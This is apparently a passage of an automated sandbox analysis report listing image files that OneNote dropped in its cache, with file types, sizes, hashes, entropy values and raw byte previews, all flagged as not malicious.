Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000082.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000083.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000085.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000087.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000089.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
